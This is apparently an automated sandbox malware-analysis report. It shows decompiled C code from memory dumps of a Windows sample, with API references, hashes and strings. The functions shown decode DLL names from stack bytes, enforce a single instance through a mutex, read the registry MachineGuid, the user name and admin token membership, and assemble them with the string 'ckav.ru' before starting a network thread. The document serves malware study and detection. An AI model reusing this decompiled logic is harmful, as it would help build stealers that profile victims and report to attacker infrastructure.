ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A

Strings

.tmp, xrefs: 00404196

Memory Dump Source

Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd

Yara matches

Similarity

API ID: File$AllocCreateReadVirtual
String ID: .tmp
API String ID: 3585551309-2986845003
Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9

Uniqueness

Uniqueness Score: -1.00%

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00413866(void* __eflags) {
				short _v6;
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				char _v24;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				char _v48;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				char _v76;
				void* __ebx;
				void* __edi;
				void* _t38;
				short _t43;
				short _t44;
				short _t45;
				short _t46;
				short _t47;
				short _t48;
				short _t50;
				short _t51;
				short _t52;
				short _t54;
				short _t55;
				intOrPtr* _t57;
				intOrPtr* _t59;
				intOrPtr* _t61;
				void* _t63;
				WCHAR* _t65;
				long _t68;
				void* _t75;
				short _t76;
				short _t78;
				short _t83;
				short _t84;
				short _t85;

				E00402C6C(_t38);
				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
				SetErrorMode(3); // executed
				_t43 = 0x4f;
				_v76 = _t43;
				_t44 = 0x4c;
				_v74 = _t44;
				_t45 = 0x45;
				_v72 = _t45;
				_t46 = 0x41;
				_v70 = _t46;
				_t47 = 0x55;
				_v68 = _t47;
				_t48 = 0x54;
				_t76 = 0x33;
				_t84 = 0x32;
				_t83 = 0x2e;
				_t78 = 0x64;
				_t85 = 0x6c;
				_v66 = _t48;
				_v52 = 0;
				_t50 = 0x77;
				_v48 = _t50;
				_t51 = 0x73;
				_v46 = _t51;
				_t52 = 0x5f;
				_v42 = _t52;
				_v28 = 0;
				_t54 = 0x6f;
				_v24 = _t54;
				_t55 = 0x65;
				_v20 = _t55;
				_v64 = _t76;
				_v62 = _t84;
				_v60 = _t83;
				_v58 = _t78;
				_v56 = _t85;
				_v54 = _t85;
				_v44 = _t84;
				_v40 = _t76;
				_v38 = _t84;
				_v36 = _t83;
				_v34 = _t78;
				_v32 = _t85;
				_v30 = _t85;
				_v22 = _t85;
				_v18 = _t76;
				_v16 = _t84;
				_v14 = _t83;
				_v12 = _t78;
				_v10 = _t85;
				_v8 = _t85;
				_v6 = 0;
				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t57( &_v76);
				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t59( &_v48);
				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				_t81 =  &_v24;
				 *_t61( &_v24); // executed
				_t63 = E00414059(); // executed
				if(_t63 != 0) {
					_t65 = E00413D97(0);
					E004031E5(0, 0, 0xcf167df4, 0, 0);
					CreateMutexW(0, 1, _t65); // executed
					_t68 = GetLastError();
					_t92 = _t68 - 0xb7;
					if(_t68 == 0xb7) {
						E00413B81(0);
						_pop(_t81); // executed
					}
					E00413003(_t92); // executed
					E00412B2E(_t92); // executed
					E00412D31(_t81, _t84); // executed
					E00413B3F();
					E00413B81(0);
					 *0x49fdd0 = 1;
				}
				return 0;
			}

0x0041386f
0x0041387e
0x00413885
0x00413889
0x0041388c
0x00413890
0x00413893
0x00413897
0x0041389a
0x0041389e
0x004138a1
0x004138a5
0x004138a8
0x004138ac
0x004138af
0x004138b2
0x004138b5
0x004138b8
0x004138bb
0x004138bc
0x004138c4
0x004138c8
0x004138cb
0x004138cf
0x004138d2
0x004138d6
0x004138d7
0x004138df
0x004138e3
0x004138e4
0x004138ea
0x004138eb
0x004138f1
0x004138f5
0x004138f9
0x004138fd
0x00413901
0x00413905
0x00413909
0x0041390d
0x00413911
0x00413915
0x00413919
0x0041391d
0x00413921
0x00413925
0x00413929
0x0041392d
0x00413931
0x00413935
0x00413939
0x0041393d
0x00413941
0x00413950
0x00413959
0x0041395f
0x00413968
0x0041396e
0x00413973
0x00413977
0x00413979
0x00413980
0x00413982
0x00413991
0x0041399c
0x0041399e
0x004139a4
0x004139a9
0x004139ac
0x004139b1
0x004139b1
0x004139b2
0x004139b7
0x004139bc
0x004139c1
0x004139c7
0x004139cd
0x004139cd
0x004139db

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Uniqueness

Uniqueness Score: -1.00%

Function 004042CF Relevance: 4.6, APIs: 3, Instructions: 60
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
				long _v8;
				void* _t7;
				long _t10;
				void* _t21;
				struct _OVERLAPPED* _t24;

				_t14 = __ebx;
				_t24 = 0;
				_v8 = 0;
				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
				_t21 = _t7;
				if(_t21 != 0xffffffff) {
					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
					if(_t10 != 0xffffffff) {
						E004031E5(_t14, 0, 0xc148f916, 0, 0);
						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
						_t24 =  !=  ? 1 : 0;
					}
					E00403C40(_t21); // executed
				}
				return _t24;
			}

0x004042cf
0x004042d5
0x004042df
0x004042e2
0x004042f9
0x004042fb
0x00404300
0x0040430a
0x00404314
0x00404319
0x00404323
0x00404334
0x0040433b
0x0040433b
0x0040433f
0x00404344
0x0040434c

APIs

CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334

Memory Dump Source

Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd

Yara matches

Similarity

API ID: File$CreatePointerWrite
String ID:
API String ID: 3672724799-0
Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8

Uniqueness

Uniqueness Score: -1.00%

Function 00412D31 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178
threadCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E00412D31(void* __ecx, void* __edi) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				char _v40;
				void* __ebx;
				intOrPtr* _t10;
				void* _t11;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t35;
				void* _t53;
				char* _t57;
				void* _t58;
				void* _t61;
				void* _t64;
				void* _t65;
				intOrPtr* _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				void* _t73;

				_t53 = __ecx;
				_t10 =  *0x49fde0;
				_t68 = _t67 - 0x24;
				 *0x49fddc = 0x927c0;
				 *0x49fde4 = 0;
				_t75 = _t10;
				if(_t10 != 0) {
					L16:
					_push(1);
					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
					_t61 = _t11;
					_t68 = _t68 + 0xc;
					if(_t61 != 0) {
						E004031E5(0, 0, 0xfcae4162, 0, 0);
						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
					}
					L004067C4(0xea60); // executed
					_pop(_t53);
				} else {
					_push(__edi);
					 *0x49fde0 = E004056BF(0x2bc);
					E00413DB7(_t53, _t75,  &_v40);
					_t57 =  &_v24;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E004058D4( *0x49fde0, 0x12);
					E004058D4( *0x49fde0, 0x28);
					E00405872( *0x49fde0, "ckav.ru", 0, 0);
					_t69 = _t68 + 0x28;
					_t64 = E0040632F();
					_push(0);
					_push(1);
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						E00405872();
						_t70 = _t69 + 0x10;
					} else {
						_push(_t64);
						_push( *0x49fde0);
						E00405872();
						E00402BAB(_t64);
						_t70 = _t69 + 0x14;
					}
					_t58 = E00406130(_t57);
					_push(0);
					_push(1);
					_t77 = _t64;
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t25 = E00405872();
						_t71 = _t70 + 0x10; // executed
					} else {
						_push(_t58);
						_push( *0x49fde0);
						E00405872();
						_t25 = E00402BAB(_t58);
						_t71 = _t70 + 0x14;
					}
					_t26 = E004061C3(_t25, 0, _t77); // executed
					_t65 = _t26;
					_push(0);
					_push(1);
					if(_t65 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t27 = E00405872();
						_t72 = _t71 + 0x10;
					} else {
						_push(_t65);
						_push( *0x49fde0);
						E00405872();
						_t27 = E00402BAB(_t65);
						_t72 = _t71 + 0x14;
					}
					_t66 = E00406189(_t27);
					_t79 = _t66;
					if(_t66 == 0) {
						E00405781( *0x49fde0, 0);
						E00405781( *0x49fde0, 0);
						_t73 = _t72 + 0x10;
					} else {
						E00405781( *0x49fde0,  *_t66);
						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
						E00402BAB(_t66);
						_t73 = _t72 + 0x14;
					}
					E004058D4( *0x49fde0, E004063B2(0, _t53, _t79));
					E004058D4( *0x49fde0, E004060BD(_t79)); // executed
					_t35 = E0040642C(_t79); // executed
					E004058D4( *0x49fde0, _t35);
					E004058D4( *0x49fde0, _v24);
					E004058D4( *0x49fde0, _v20);
					E004058D4( *0x49fde0, _v16);
					E004058D4( *0x49fde0, _v12);
					E00405872( *0x49fde0, E00413D97(0), 1, 0);
					_t68 = _t73 + 0x48;
				}
				_t80 =  *0x49fde4;
				if( *0x49fde4 == 0) {
					_t10 =  *0x49fde0;
					goto L16;
				}
				return E00405695(_t53,  *0x49fde0);
			}

0x00412d31
0x00412d34
0x00412d39
0x00412d3c
0x00412d49
0x00412d50
0x00412d52
0x00412f24
0x00412f24
0x00412f2b
0x00412f30
0x00412f32
0x00412f37
0x00412f41
0x00412f53
0x00412f53
0x00412f5b
0x00412f60
0x00412d58
0x00412d58
0x00412d63
0x00412d6c
0x00412d73
0x00412d7e
0x00412d7f
0x00412d80
0x00412d81
0x00412d82
0x00412d8f
0x00412da1
0x00412da6
0x00412dae
0x00412db0
0x00412db1
0x00412db5
0x00412dce
0x00412dcf
0x00412dd5
0x00412dda
0x00412db7
0x00412db7
0x00412db8
0x00412dbe
0x00412dc4
0x00412dc9
0x00412dc9
0x00412de2
0x00412de4
0x00412de5
0x00412de7
0x00412de9
0x00412e02
0x00412e03
0x00412e09
0x00412e0e
0x00412deb
0x00412deb
0x00412dec
0x00412df2
0x00412df8
0x00412dfd
0x00412dfd
0x00412e11
0x00412e17
0x00412e19
0x00412e1a
0x00412e1e
0x00412e37
0x00412e38
0x00412e3e
0x00412e43
0x00412e20
0x00412e20
0x00412e21
0x00412e27
0x00412e2d
0x00412e32
0x00412e32
0x00412e4b
0x00412e4d
0x00412e4f
0x00412e7e
0x00412e8a
0x00412e8f
0x00412e51
0x00412e59
0x00412e67
0x00412e6d
0x00412e72
0x00412e72
0x00412e9e
0x00412eaf
0x00412eb4
0x00412ec0
0x00412ece
0x00412edc
0x00412eea
0x00412ef8
0x00412f0f
0x00412f14
0x00412f14
0x00412f17
0x00412f1d
0x00412f1f
0x00000000
0x00412f1f
0x00412f74

APIs

CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53

Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F

Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0

Strings

ckav.ru, xrefs: 00412D96

Memory Dump Source

Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd

Yara matches

Similarity

API ID: Heap$CreateFreeProcessThread_wmemset
String ID: ckav.ru
API String ID: 2915393847-2696028687
Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED

Uniqueness

Uniqueness Score: -1.00%

Function 0040632F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040632F() {
				char _v8;
				void* _t4;
				void* _t7;
				void* _t16;

				_t16 = E00402B7C(0x208);
				if(_t16 == 0) {
					L4:
					_t4 = 0;
				} else {
					E0040338C(_t16, 0, 0x104);
					_t1 =  &_v8; // 0x4143e8
					_v8 = 0x208;
					_t7 = E00406069(_t16, _t1); // executed
					if(_t7 == 0) {
						E00402BAB(_t16);
						goto L4;
					} else {
						_t4 = _t16;
					}
				}
				return _t4;
			}

0x00406340
0x00406345
0x00406373
0x00406373
0x00406347
0x0040634f
0x00406354
0x00406357
0x0040635c
0x00406366
0x0040636d
0x00000000
0x00406368
0x00406368
0x00406368
0x00406366
0x0040637a

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

_wmemset.LIBCMT ref: 0040634F

Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082

Strings

CA, xrefs: 00406354, 0040635A

Memory Dump Source

Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser_wmemset
String ID: CA
API String ID: 2078537776-1052703068
Opcode ID: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
Opcode Fuzzy Hash: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD

Uniqueness

Uniqueness Score: -1.00%

Function 00406086 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
				int _t7;
				void* _t8;

				E004031E5(_t8, 9, 0xecae3497, 0, 0);
				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
				return _t7;
			}

0x00406094
0x004060a8
0x004060ab

APIs

GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8

Strings

IDA, xrefs: 00406086

Memory Dump Source

Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID: IDA
API String ID: 4114910276-365204570
Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95

Uniqueness

Uniqueness Score: -1.00%

Function 00402C03 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402C03(struct HINSTANCE__* _a4, char _a8) {
				_Unknown_base(*)()* _t5;
				void* _t6;

				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
				_t1 =  &_a8; // 0x403173
				_t5 = GetProcAddress(_a4,  *_t1); // executed
				return _t5;
			}

0x00402c10
0x00402c15
0x00402c1b
0x00402c1e

APIs

GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B

Strings

s1@, xrefs: 00402C15

Memory Dump Source

Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID: s1@
API String ID: 190572456-427247929
Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4

Uniqueness

Uniqueness Score: -1.00%

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63
registryCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00404A52(void* _a4, char* _a8, char* _a12) {
				void* _v8;
				int _v12;
				void* __ebx;
				char* _t10;
				long _t13;
				char* _t27;

				_push(_t21);
				_t27 = E00402B7C(0x208);
				if(_t27 == 0) {
					L4:
					_t10 = 0;
				} else {
					E00402B4E(_t27, 0, 0x208);
					_v12 = 0x208;
					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
					if(_t13 != 0) {
						E00402BAB(_t27);
						goto L4;
					} else {
						E004031E5(0, 9, 0xfe9f661a, 0, 0);
						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
						E00404A39(_v8); // executed
						_t10 = _t27;
					}
				}
				return _t10;
			}

0x00404a56
0x00404a65
0x00404a6a
0x00404ad1
0x00404ad1
0x00404a6c
0x00404a71
0x00404a79
0x00404a85
0x00404a9a
0x00404a9e
0x00404acb
0x00000000
0x00404aa0
0x00404aac
0x00404abc
0x00404ac1
0x00404ac6
0x00404ac6
0x00404a9e
0x00404ad9

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd

Yara matches

Similarity

API ID: Heap$AllocateOpenProcessQueryValue
String ID:
API String ID: 1425999871-0
Opcode ID: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Uniqueness

Uniqueness Score: -1.00%

Function 004060BD Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E004060BD(void* __eflags) {
				signed int _v8;
				char _v12;
				short _v16;
				char _v20;
				void* __ebx;
				intOrPtr* _t12;
				signed int _t13;
				intOrPtr* _t14;
				signed int _t15;
				void* _t24;

				_v16 = 0x500;
				_v20 = 0;
				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				_v8 = _t13;
				if(_t13 != 0) {
					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t15;
					E0040604F(_v12);
					return _v8;
				}
				return _t13;
			}

0x004060c6
0x004060d5
0x004060d8
0x004060f4
0x004060f6
0x004060fb
0x0040610a
0x00406115
0x0040611c
0x0040611e
0x00406121
0x00000000
0x0040612a
0x0040612f

APIs

CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115

Memory Dump Source

Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd

Yara matches

Similarity

API ID: CheckMembershipToken
String ID:
API String ID: 1351025785-0
Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764

Uniqueness

Uniqueness Score: -1.00%

Function 00403C62 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
				void* _t3;
				int _t5;

				_t3 = E00403D4D(__eflags, _a4); // executed
				if(_t3 == 0) {
					__eflags = 0;
					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
					_t5 = CreateDirectoryW(_a4, 0); // executed
					return _t5;
				} else {
					return 1;
				}
			}

0x00403c68
0x00403c70
0x00403c78
0x00403c82
0x00403c8b
0x00403c8f
0x00403c72
0x00403c76
0x00403c76

APIs

CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B

Memory Dump Source

Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4

Uniqueness

Uniqueness Score: -1.00%

